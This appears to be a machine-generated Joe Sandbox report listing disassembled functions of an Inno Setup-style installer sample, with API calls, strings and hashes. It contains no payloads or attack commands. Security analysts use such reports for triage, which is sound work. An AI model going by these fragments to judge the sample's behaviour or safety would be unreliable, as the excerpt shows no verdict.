                                                    • String ID:
                                                    • API String ID: 3573811560-0
                                                    • Opcode ID: 710d086b1de04f4d575db38747d659360b557b0cb5838dc09f26a38d22fa0d7e
                                                    • Instruction ID: 462cd7651d9f59a3c1518f9422d26db27efab3bc10fcb75ee14264e6343fb545
                                                    • Opcode Fuzzy Hash: 710d086b1de04f4d575db38747d659360b557b0cb5838dc09f26a38d22fa0d7e
                                                    • Instruction Fuzzy Hash: 0E11EC706456055AE340FFAA6A52BAA3695E724708F00813FF6099F3D1D77D2C444B9F
                                                    APIs
                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 0046316C
                                                    • SetCursor.USER32(00000000,00000000,00007F02,00000000,00463201), ref: 00463172
                                                    • SetCursor.USER32(?,004631E9,00007F02,00000000,00463201), ref: 004631DC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Cursor$Load
                                                    • String ID: $ $Internal error: Item already expanding
                                                    • API String ID: 1675784387-1948079669
                                                    • Opcode ID: 18a8c92a23110e1585e61799d78ad50682638d437455fe8a8eac84c2222b077b
                                                    • Instruction ID: 8c03ff8e54c482a295deb11cd31210a84b03b27930917a3eb50de1af6f5dfb0a
                                                    • Opcode Fuzzy Hash: 18a8c92a23110e1585e61799d78ad50682638d437455fe8a8eac84c2222b077b
                                                    • Instruction Fuzzy Hash: A7B1C430A00284DFD711DF69C589B9ABBF1FF04305F1484AAE8459B792EB78EE45CB19
                                                    APIs
                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453DEB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfileStringWrite
                                                    • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                    • API String ID: 390214022-3304407042
                                                    • Opcode ID: 7a42a0697151d0d5d2c191e5f1412612b4bf9d75eff795acc860741356bb7580
                                                    • Instruction ID: 27719b604a15c88968755e1a1929315a4e70c7568c957628d41e5ea0e69e6a26
                                                    • Opcode Fuzzy Hash: 7a42a0697151d0d5d2c191e5f1412612b4bf9d75eff795acc860741356bb7580
                                                    • Instruction Fuzzy Hash: DD914434E001099BDF11EFA5D882BDEB7F5EF4834AF508066E90077292D778AE49CB58
                                                    APIs
                                                    • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 0047673D
                                                    • 73A259E0.USER32(00000000,000000FC,00476698,00000000,0047697C,?,00000000,004769A6), ref: 00476764
                                                    • GetACP.KERNEL32(00000000,0047697C,?,00000000,004769A6), ref: 004767A1
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004767E7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: A259ClassInfoMessageSend
                                                    • String ID: COMBOBOX$Inno Setup: Language
                                                    • API String ID: 3217714596-4234151509
                                                    • Opcode ID: c91c96764c9eb46afea8f4730bcae4c036a3e37d4e33096e95ae453515e7d384
                                                    • Instruction ID: 91173772f4e079f50c7e0c6215708d31291a540b6063389a75a2ac3d3f1b2ee4
                                                    • Opcode Fuzzy Hash: c91c96764c9eb46afea8f4730bcae4c036a3e37d4e33096e95ae453515e7d384
                                                    • Instruction Fuzzy Hash: 68814074A006059FCB10EF69C985AEAB7F5FB09304F56C0BAE808E7362D734AD45CB59
                                                    APIs
                                                    • GetSystemDefaultLCID.KERNEL32(00000000,00408958,?,?,?,?,00000000,00000000,00000000,?,0040995F,00000000,00409972), ref: 0040872A
                                                      • Part of subcall function 00408558: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                      • Part of subcall function 004085A4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087A6,?,?,?,00000000,00408958), ref: 004085B7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: InfoLocale$DefaultSystem
                                                    • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                    • API String ID: 1044490935-665933166
                                                    • Opcode ID: e4d4874023cbce5b0e58a93798fb9a357b254c43991a542c79008375c0b91d34
                                                    • Instruction ID: acf8fabd4b29bc0114a799655761a3ccdfd58ddc6ec536e3fe46e21ad76a8ffd
                                                    • Opcode Fuzzy Hash: e4d4874023cbce5b0e58a93798fb9a357b254c43991a542c79008375c0b91d34
                                                    • Instruction Fuzzy Hash: 85515C24B001486BDB00FBA99E91A9E77A9DB84308F50C47FA151BB3C7CE3CDA05975D
                                                    APIs
                                                    • GetVersion.KERNEL32(00000000,004118F1), ref: 00411784
                                                    • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 00411842
                                                      • Part of subcall function 00411AA4: CreatePopupMenu.USER32 ref: 00411ABE
                                                    • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118CE
                                                      • Part of subcall function 00411AA4: CreateMenu.USER32 ref: 00411AC8
                                                    • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118B5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Menu$Insert$Create$ItemPopupVersion
                                                    • String ID: ,$?
                                                    • API String ID: 2359071979-2308483597
                                                    • Opcode ID: e0c9a44165d56187b0795cac699610ea385af12d5fd7003569757b390febdefd
                                                    • Instruction ID: d8c93b49542c4992b593f331124e59532eba8c65ca5fe63237d6ba0ca55a8ecc
                                                    • Opcode Fuzzy Hash: e0c9a44165d56187b0795cac699610ea385af12d5fd7003569757b390febdefd
                                                    • Instruction Fuzzy Hash: 9E510370A00245ABDB10EF6ADD816EA7BF9AF09304B15857BF904E73A2D738DD41CB58
                                                    APIs
                                                    • GetObjectA.GDI32(?,00000018,?), ref: 0041BF20
                                                    • GetObjectA.GDI32(?,00000018,?), ref: 0041BF2F
                                                    • GetBitmapBits.GDI32(?,?,?), ref: 0041BF80
                                                    • GetBitmapBits.GDI32(?,?,?), ref: 0041BF8E
                                                    • DeleteObject.GDI32(?), ref: 0041BF97
                                                    • DeleteObject.GDI32(?), ref: 0041BFA0
                                                    • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFBD
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Object$BitmapBitsDelete$CreateIcon
                                                    • String ID:
                                                    • API String ID: 1030595962-0
                                                    • Opcode ID: a6b868a807f1f599719e52264ea8325182c659afeabb6b194134e5b91d426331
                                                    • Instruction ID: 4619fcafd17693633a8c31a92518bd0abdf88944d34ea3f3446ff31194e2e661
                                                    • Opcode Fuzzy Hash: a6b868a807f1f599719e52264ea8325182c659afeabb6b194134e5b91d426331
                                                    • Instruction Fuzzy Hash: 48510375A00219AFCF10DFA9C8819EEB7F9EF48314B11856AF914E7391D738AD81CB64
                                                    APIs
                                                    • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEF6
                                                    • 73A24620.GDI32(00000000,00000026), ref: 0041CF15
                                                    • 73A18830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF7B
                                                    • 73A122A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CF8A
                                                    • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFF4
                                                    • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D032
                                                    • 73A18830.GDI32(?,?,00000001,0041D064,00000000,00000026), ref: 0041D057
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Stretch$A18830$A122A24620BitsMode
                                                    • String ID:
                                                    • API String ID: 430401518-0
                                                    • Opcode ID: c81279b313576d135e7f058ec71da99c22708ae42f226878f0d4e896de0476ba
                                                    • Instruction ID: 9b717f45caa71cbdb3d7743a5068819f31981c945c02765ea0762fde20f1409d
                                                    • Opcode Fuzzy Hash: c81279b313576d135e7f058ec71da99c22708ae42f226878f0d4e896de0476ba
                                                    • Instruction Fuzzy Hash: 17513F70604204AFDB14DFA8C985F9BBBF9EF08304F14459AB545E7692C778ED81CB58
                                                    APIs
                                                    • SendMessageA.USER32(00000000,?,?), ref: 0045714E
                                                      • Part of subcall function 00424274: GetWindowTextA.USER32(?,?,00000100), ref: 00424294
                                                      • Part of subcall function 0041EE9C: GetCurrentThreadId.KERNEL32 ref: 0041EEEB
                                                      • Part of subcall function 0041EE9C: 73A25940.USER32(00000000,0041EE4C,00000000,00000000,0041EF08,?,00000000,0041EF3F,?,0042EEA8,?,00000001), ref: 0041EEF1
                                                      • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004571B5
                                                    • TranslateMessage.USER32(?), ref: 004571D3
                                                    • DispatchMessageA.USER32(?), ref: 004571DC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Message$TextWindow$A25940CurrentDispatchSendThreadTranslate
                                                    • String ID: [Paused]
                                                    • API String ID: 3047529653-4230553315
                                                    • Opcode ID: 80c4c27c4b754fe1519de729eb729efa4ffa2fc2b03d19605f480c373ee661fa
                                                    • Instruction ID: 4dd0f6a69861fba71970a0c95394483262e0630457e8f7cd4854214566cc162d
                                                    • Opcode Fuzzy Hash: 80c4c27c4b754fe1519de729eb729efa4ffa2fc2b03d19605f480c373ee661fa
                                                    • Instruction Fuzzy Hash: EC3196319082449EDB11DFB5EC81B9E7FB8EB49314F5544BBF800E7292D63C9909CB69
                                                    APIs
                                                    • GetCursor.USER32(00000000,0046B37F), ref: 0046B2FC
                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 0046B30A
                                                    • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B310
                                                    • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B31A
                                                    • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B320
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Cursor$LoadSleep
                                                    • String ID: CheckPassword
                                                    • API String ID: 4023313301-1302249611
                                                    • Opcode ID: c5bdf5f640806f8796bfbc41b1a4ab00d3ded5bef946e97f85f4201d994c149c
                                                    • Instruction ID: dcef8ef75e700f151948083f515970cfb06be99f29bdf3d7051495a11b4a934f
                                                    • Opcode Fuzzy Hash: c5bdf5f640806f8796bfbc41b1a4ab00d3ded5bef946e97f85f4201d994c149c
                                                    • Instruction Fuzzy Hash: 9D3190347402049FD701EF69C899B9E7BE4EB49304F5580B6B904DB3A2E7789E80CB89
                                                    APIs
                                                      • Part of subcall function 00477628: GetWindowThreadProcessId.USER32(00000000), ref: 00477630
                                                      • Part of subcall function 00477628: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477727,0049C0A4,00000000), ref: 00477643
                                                      • Part of subcall function 00477628: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477649
                                                    • SendMessageA.USER32(00000000,0000004A,00000000,00477ABA), ref: 00477735
                                                    • GetTickCount.KERNEL32 ref: 0047777A
                                                    • GetTickCount.KERNEL32 ref: 00477784
                                                    • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 004777D9
                                                    Strings
                                                    • CallSpawnServer: Unexpected status: %d, xrefs: 004777C2
                                                    • CallSpawnServer: Unexpected response: $%x, xrefs: 0047776A
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                    • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                    • API String ID: 613034392-3771334282
                                                    • Opcode ID: e1b07b7da0dc81f79c626057223c48b53da9c8a9430d466ab72b2e6b955821c4
                                                    • Instruction ID: 5facb6da61392f64ef9a6a7cc904dffa3fea64199446eda4e4b81d1598b422a3
                                                    • Opcode Fuzzy Hash: e1b07b7da0dc81f79c626057223c48b53da9c8a9430d466ab72b2e6b955821c4
                                                    • Instruction Fuzzy Hash: 0131E474F042158ADF10EBB9C8467EEB6A09B08304F90807AB508EB382D67C5E01C79D
                                                    APIs
                                                    • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045965F
                                                    Strings
                                                    • Failed to load .NET Framework DLL "%s", xrefs: 00459644
                                                    • Fusion.dll, xrefs: 004595FF
                                                    • .NET Framework CreateAssemblyCache function failed, xrefs: 00459682
                                                    • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045966A
                                                    • CreateAssemblyCache, xrefs: 00459656
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                    • API String ID: 190572456-3990135632
                                                    • Opcode ID: 6db9dd5a59cee9e125ea37fcdd1d071909f295375ba02b74572753309365d729
                                                    • Instruction ID: ee3dd963a50cff277cc460556b086b348bcce4d3c12070cda944c03b6b96f9ce
                                                    • Opcode Fuzzy Hash: 6db9dd5a59cee9e125ea37fcdd1d071909f295375ba02b74572753309365d729
                                                    • Instruction Fuzzy Hash: 5D315771E00609EBCB01EFA5C88169EB7A5AF44315F50857BE814A7382DB7C9E09CB99
                                                    APIs
                                                      • Part of subcall function 0041C040: GetObjectA.GDI32(?,00000018), ref: 0041C04D
                                                    • GetFocus.USER32 ref: 0041C160
                                                    • 73A1A570.USER32(?), ref: 0041C16C
                                                    • 73A18830.GDI32(?,?,00000000,00000000,0041C1EB,?,?), ref: 0041C18D
                                                    • 73A122A0.GDI32(?,?,?,00000000,00000000,0041C1EB,?,?), ref: 0041C199
                                                    • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B0
                                                    • 73A18830.GDI32(?,00000000,00000000,0041C1F2,?,?), ref: 0041C1D8
                                                    • 73A1A480.USER32(?,?,0041C1F2,?,?), ref: 0041C1E5
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: A18830$A122A480A570BitsFocusObject
                                                    • String ID:
                                                    • API String ID: 2231653193-0
                                                    • Opcode ID: 9c9984a03792254f7cf3ad1787892f213a144d0a64db434cb782e1e94da2dcd6
                                                    • Instruction ID: 42301c90dcb8571f5cbc3500225c3f0eaf81cc24073f805a24a28427ce123417
                                                    • Opcode Fuzzy Hash: 9c9984a03792254f7cf3ad1787892f213a144d0a64db434cb782e1e94da2dcd6
                                                    • Instruction Fuzzy Hash: D7116D71A44618BBDF00DBE9CC81FAFB7FCEB48700F14446AB518E7281DA3899008B28
                                                    APIs
                                                    • GetSystemMetrics.USER32(0000000E), ref: 00418C68
                                                    • GetSystemMetrics.USER32(0000000D), ref: 00418C70
                                                    • 6F532980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C76
                                                      • Part of subcall function 004099A8: 6F52C400.COMCTL32(0049B628,000000FF,00000000,00418CA4,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099AC
                                                    • 6F59CB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CC6
                                                    • 6F59C740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD1
                                                    • 6F59CB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000), ref: 00418CE4
                                                    • 6F530860.COMCTL32(0049B628,00418D07,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E), ref: 00418CFA
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem$C400C740F530860F532980
                                                    • String ID:
                                                    • API String ID: 209721339-0
                                                    • Opcode ID: 3e87c7a23a4a947163f4d2b90e583babc0fab05060521c53009111721e1cf9e6
                                                    • Instruction ID: c5403bac5749a6cea20ad86aefc03aeb17a2f2ee6000d3a37742d6553dc7a201
                                                    • Opcode Fuzzy Hash: 3e87c7a23a4a947163f4d2b90e583babc0fab05060521c53009111721e1cf9e6
                                                    • Instruction Fuzzy Hash: 981124B1B44304BFDB10EBA9EC82F5E73B8DB48714F50406AB504EB2C2DAB99D408659
                                                    APIs
                                                      • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004832E0), ref: 004832C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseOpen
                                                    • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                    • API String ID: 47109696-2530820420
                                                    • Opcode ID: 069f94f9fa12544f7a36e7bd85e6d1afcaa647915ea6f8fcf756052135ad9446
                                                    • Instruction ID: b53b4caf4df369742718f420b864b5eadf64457ff5313130662490eff196aabe
                                                    • Opcode Fuzzy Hash: 069f94f9fa12544f7a36e7bd85e6d1afcaa647915ea6f8fcf756052135ad9446
                                                    • Instruction Fuzzy Hash: 7E115130704244AADB10FFA59852B5F7BA8DB55B05F6188B7A800A7282D7389E02871D
                                                    APIs
                                                    • 73A1A570.USER32(00000000,?,?,00000000), ref: 00494A25
                                                      • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00494A47
                                                    • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00494FC5), ref: 00494A5B
                                                    • GetTextMetricsA.GDI32(00000000,?), ref: 00494A7D
                                                    • 73A1A480.USER32(00000000,00000000,00494AA7,00494AA0,?,00000000,?,?,00000000), ref: 00494A9A
                                                    Strings
                                                    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00494A52
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
